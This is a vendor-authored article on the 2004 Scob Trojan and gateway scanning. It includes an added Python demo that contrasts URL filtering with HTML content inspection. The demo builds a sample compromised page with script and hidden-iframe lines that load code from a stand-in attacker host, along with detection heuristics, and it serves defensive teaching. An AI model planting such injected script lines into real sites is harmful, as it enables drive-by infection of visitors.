By: F.Matthew Young III, Vice President for Asia Pacific,
Fortinet, Inc.
NEW DELHI: In mid-2004, malicious code took a turn for the worse, intensifying
interest in both network and host security. The Scob Trojan (also known as
Download.ject) and the various Sasser worm variants are more sophisticated than
earlier viruses, and Scob's payload is especially dangerous.
Outbreaks of the Scob Trojan have serious implications for both businesses
and individuals. Scob installs a keystroke logger that records whatever the user
types on the infected computer and sends it over the Internet to the attacker.
Once the logger is running, information such as an online banking login, user
name and password, PIN (Personal Identification Number), even a network login
name and password, is no longer secure or confidential.
Such keystroke loggers have disturbing implications for businesses. When
banking data gets compromised and customers lose money through these malicious
attacks, who bears the liability? If the infected PC or laptop was
operating behind a company firewall, should the company bear part of the blame -
and the liability?
The implications for government agencies and the military are even more
serious, because lives could potentially be at risk. For this reason US-CERT
(the United States Computer Emergency Readiness Team) issued an advisory that
listed switching from Microsoft's Internet Explorer to another web browser
among its recommended workarounds.
You Are Not Alone
Security problems can be more acute in SOHOs (small office/home office) and
smaller offices, which tend to be less strict than big corporations in enforcing
virus scanning and keeping virus signature files up to date. With smaller IT
budgets and teams, they are more vulnerable because they have neither the time,
money nor staff to keep out such sophisticated attacks.
Modes of Transmission
The ubiquity of viruses and worms propagated by email may have contributed to
the browser “blind spot”. The Scob Trojan exploits a weakness in
Microsoft's Internet Explorer that allows a script to be executed on the user's
machine simply by viewing a web page. The threat comes not from obviously fake
websites or sites with dubious content (for example, pornography and bootleg
software sites) but from reputable sites that have been compromised, such as
the Kelley Blue Book automobile pricing guide. Because typical website filtering
in firewalls decides by site category or reputation, and never looks at the
page content, it lets the injected script straight through. This mode of attack
caught Microsoft by surprise, prompting the company to ship a configuration
change as an interim workaround ahead of a proper patch.
The Scob Trojan is essentially a “binary agent” method of attack: like a
two-part chemical agent, it needs two components that are inert on their own, a
compromised web server and a browser vulnerability, in order to work. This level
of sophistication in a virus is quite frightening. Previous viruses required
action on the user's part, such as clicking an attachment or permitting a
download; Scob requires neither, only a visit to an infected page. Because
nothing arrives by email, virus and spam filtering on mail servers never sees
the payload and simply cannot stop it.
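The point that category-based URL filtering cannot see an injected script on an otherwise reputable site is easy to demonstrate. The following Python example is added here and is not from the original article nor from any Fortinet product: it contrasts a filter that decides on the host name alone with a gateway that inspects the HTML body for cross-site script loads and hidden frames. The host names (`www.autoprices.example`, `dl.attacker-host.example`), the two sample pages and the detection heuristics are all constructed for illustration and are not Scob's actual indicators.

```python
"""Added example (not from the original article): why URL filtering misses an
injected script on a reputable site, and what a content-inspecting gateway
would look for instead. All host names, pages and heuristics below are
constructed for illustration; they are not Scob's real indicators."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical "reputable" site that a URL/category filter simply trusts.
TRUSTED_HOSTS = {"www.autoprices.example"}

# Constructed page from that site, untouched.
CLEAN_PAGE = """<html><head><title>Used car prices</title>
<script src="/static/app.js"></script>
<script>function init() { document.title += " - 2004"; }</script>
</head><body onload="init()"><h1>Pricing guide</h1><p>Select a model.</p>
</body></html>"""

# The same page after a server compromise: a footer was appended that loads
# code from an unrelated (invented) host and writes a hidden frame.
INJECTED_PAGE = CLEAN_PAGE.replace(
    "</body></html>",
    '<script src="http://dl.attacker-host.example/x.js"></script>\n'
    "<script>document.write('<iframe src=\"http://dl.attacker-host.example/f.htm\""
    " width=0 height=0></iframe>');</script>\n</body></html>")


class ScriptCollector(HTMLParser):
    """Collects external script sources, inline script bodies and iframes."""

    def __init__(self):
        super().__init__()
        self.external_scripts = []
        self.inline_scripts = []
        self.iframes = []          # (src, width, height)
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            if a.get("src"):
                self.external_scripts.append(a["src"])
            else:
                self._in_script, self._buf = True, []
        elif tag == "iframe":
            self.iframes.append((a.get("src") or "", a.get("width"), a.get("height")))

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline_scripts.append("".join(self._buf))


def url_filter_verdict(url):
    """A URL/category filter decides on the host alone, so a compromised but
    reputable host is allowed and the page body is never examined."""
    return "allow" if urlparse(url).hostname in TRUSTED_HOSTS else "block"


def content_inspect(page_url, html):
    """Inspect the HTML body the way a content-scanning gateway would.
    Returns a list of findings; an empty list means nothing suspicious."""
    page_host = urlparse(page_url).hostname
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src in parser.external_scripts:
        host = urlparse(src).hostname          # None for relative URLs
        if host and host != page_host:
            findings.append(f"external script loaded from {host}")
    for src, width, height in parser.iframes:
        host = urlparse(src).hostname
        if host and host != page_host:
            findings.append(f"cross-site iframe to {host}")
        if width == "0" or height == "0":
            findings.append("zero-size (hidden) iframe")
    for body in parser.inline_scripts:
        if "document.write" in body and ("<script" in body or "<iframe" in body):
            findings.append("inline script writes <script>/<iframe> markup at load time")
    return findings


if __name__ == "__main__":
    url = "http://www.autoprices.example/prices"
    print("URL filter:", url_filter_verdict(url))
    print("Content findings:", content_inspect(url, INJECTED_PAGE))
```

Run stand-alone, the URL filter answers "allow" for the compromised page while the content inspector reports the cross-site script load and the script that writes a hidden frame; the clean page produces no findings. The heuristics are deliberately generic (a script from a third host, a zero-size or cross-site iframe, markup written at load time) because a gateway cannot rely on knowing the attacker's host in advance, and any real deployment would need an allow-list for legitimate third-party script hosts such as advertising or analytics providers.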
The Russian website that received keystroke information from infected
machines was quickly shut down, but the precedent had already been set.
Typically, when a new virus method is “developed”, it heralds further attacks
built on it, even though anti-virus companies may already have detection and
removal in place for the original.
A little history and modern medicine
Security problems have been with us from the early days of computing.
The Michelangelo virus, on DOS, predated widespread Internet access, spreading
through the boot sectors of shared floppy disks. Transmission was slow because
few companies and organisations used networks. With the Internet, transmission
is far easier and an infection can spread rapidly to many more computers.
Anti-virus software is understood by the vast majority of system
administrators as a “host-only” solution. That is, the anti-virus software
is installed on PCs, laptops and servers by system administrators, scans are
executed on each machine itself, and every machine has to fetch its own
signature updates.
This is a difficult strategy to implement and maintain, as any system
administrator will attest. Users are hard to train to run periodic virus scans
and signature updates, and are prone to clicking attachments and infecting their
own systems. The problem escalates dramatically for larger companies, where
technology professionals are usually stretched thin by the demands of the
information infrastructure and often give a low priority to maintaining
security on individual PCs. Yet these individual PCs are the weakest link in the
company network.
A better strategy involves stopping viruses and spam at the gateway, and
there are products available that do this. The idea is that if you can stop
most of the malicious content “out there” from entering your network, the
security situation on individual PCs and laptops becomes far more manageable.
System administrators can concentrate on one, or a few, servers or network
appliances, instead of tens or hundreds of user workstations. Gateway scanning
complements host protection rather than replacing it: a laptop that leaves the
network, or traffic the gateway cannot decrypt, is still protected only by
whatever runs on the host.
To read more, log on to www.ciol.com/security